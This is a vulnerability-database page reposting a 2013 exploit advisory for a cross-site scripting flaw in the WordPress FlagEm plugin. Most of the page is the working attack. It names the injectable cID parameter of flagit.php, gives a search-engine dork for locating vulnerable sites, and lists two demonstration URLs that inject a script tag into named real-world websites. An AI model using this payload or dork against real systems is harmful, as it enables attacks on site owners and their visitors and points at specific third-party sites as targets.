WordPress FlagEm Cross Site Scripting

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044696 漏洞类型
发布时间 2013-07-23 更新时间 2013-07-23
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013070173
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#################################

#          Iranian Exploit DataBase

#           http://iedb.ir

#################################

# Exploit Title : WordPress FlagEm plugin Cross-Site Scripting Vulnerabilities

# Author : Iranian Exploit DataBase

# Discovered By : IeDb

# Email : IeDb.Team@Gmail.com

# Home : http://iedb.ir

# Software Link : http://wordpress.org/

# Security Risk : High

# Tested on : Linux

# Dork : inurl:/plugins/FlagEm/

#################################

# Exploit :

# [TarGeT]/wp-content/plugins/FlagEm/flagit.php?cID=[Xss]

# Dem0 :

# http://multimedia.timeslive.co.za/wp-content/plugins/FlagEm/flagit.php?cID=69387"><script>alert(/IeDb.Ir/)</script>

# http://www.blogs.dispatch.co.za/dialogues/wp-content/plugins/FlagEm/flagit.php?cID=69387"><script>alert(/IeDb.Ir/)</script>

#################################


# Exploit Archive = http://www.iedb.ir/exploits-269.html

#################################